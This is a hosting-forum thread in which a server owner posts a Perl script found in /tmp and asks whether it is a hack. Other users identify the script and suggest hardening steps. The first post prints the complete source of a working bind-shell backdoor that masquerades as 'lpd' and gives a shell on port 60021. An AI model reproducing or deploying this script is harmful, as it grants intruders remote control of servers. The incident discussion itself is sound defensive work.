Possible hack?

[numberonehost]

Found .bs.pl in /tmp with these contents:
----------------------------------------------
#!/usr/bin/perl

# * Author:
# headflux (hf@synnergy.net)
# Synnergy Networks (c) 1999, http://www.synnergy.net
# *** Synnergy Networks

use Socket;

#rintf "BS\n";
#lush();

$port= 60021;
$proto= getprotobyname('tcp');
$cmd= "lpd";
$system= 'echo "(`whoami`@`uname -n`:`pwd`)"; /bin/sh';

$0 = $cmd;


socket(SERVER, PF_INET, SOCK_STREAM, $proto)
or die "socket:$!";

setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
or die "setsockopt: $!";

bind(SERVER, sockaddr_in($port, INADDR_ANY))
or die "bind: $!";

listen(SERVER, SOMAXCONN)or die "listen: $!";

for(; $paddr = accept(CLIENT, SERVER); close CLIENT)
{
open(STDIN, ">&CLIENT");
open(STDOUT, ">&CLIENT");
open(STDERR, ">&CLIENT");

system($system);

close(STDIN);
close(STDOUT);
close(STDERR);
}

----------------------------------------------

Is this used to hack the server?

I noticed mysql going "wild" on the server moments before I noticed this script. The load went above 100.

wget is diabled on my server so I was wondering how anyone can place this script in /tmp? It was owned by nobody.

I would like to try the script in this thread: http://forums.cpanel.net/showthread....threadid=11082
in order to find the domain it was uploaded by. I tried the script but found no result as wget is already disabled on my server.

If not wget was used to put it there what else might be used?

Eivind

[nybble]

The load went above 100.

Read what the script is doing and you will know if it is a hack, it lists all the commands

And wget is not the only way to put things in /tmp

[numberonehost]

Read what the script is doing and you will know if it is a hack, it lists all the commands

I'm asking because I only understand some of it but not enough to determine how serious the script is. It seems as the script opens a tcp socket at port 60021. It determines which user it is run as and at which machine and directory.

Could you tell me more about what the script does?

And wget is not the only way to put things in /tmp

I know. That's why I'm asking. Could you meantion one or two?

Eivind

[jamesbond]

lynx, curl, scp, ftp

[numberonehost]

Thanks jamesbond!

Unfortunately I was unable to determine how this file got in /tmp using the script at http://forums.cpanel.net/showthread....threadid=11082 with various tries (wget, scp, ftp, lynx, curl, bs.pl).

Is there another way to find out where this file came from?

Eivind

[nybble]

Perhaps you should ask the server admin?

[Etheral]

socket(SERVER, PF_INET, SOCK_STREAM, $proto)
or die "socket:$!";

setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1))
or die "setsockopt: $!";

bind(SERVER, sockaddr_in($port, INADDR_ANY))
or die "bind: $!";

listen(SERVER, SOMAXCONN)or die "listen: $!";

that reallly gives it away.....

[nybble]

From what I can see its a script to let someone else control your server, heh

[Etheral]

lol basicly

[numberonehost]

Thanks for your inputs guys!

It seems as if it's impossible to find the source of this file since I'm not running with php_suexec. If the file contents was download from a file with name of file.txt by php and php created the .bs.pl file in /tmp, then I have no means of finding out where the file came from or which account created this file?

I have /tmp nosuid and noexec. I thought that it would not be possible to run a script in /tmp because of this. Am I mistaken? If I am, how can I prevent such a script from running in /tmp?

I really hope anyone have an answer to this.

[nybble]

chown /tmp to "nobody"
Run suseexc, enable open_basedir protection and get a server admin.

[numberonehost]

What would chowning of /tmp to nobody accomplish (pros/cons)?

The others I've already done. I've done all the security tweaking that's normal (and not) in these forums and other forums (snort, logwatch, chkrootkit, ssh modifications, mod_security etc.).

[Ben]

More than anything else, the number one thing that will help you is to mount /tmp noexec, that, and run iptables or a similar firewall that will only allow incoming connections to certain ports and block all others.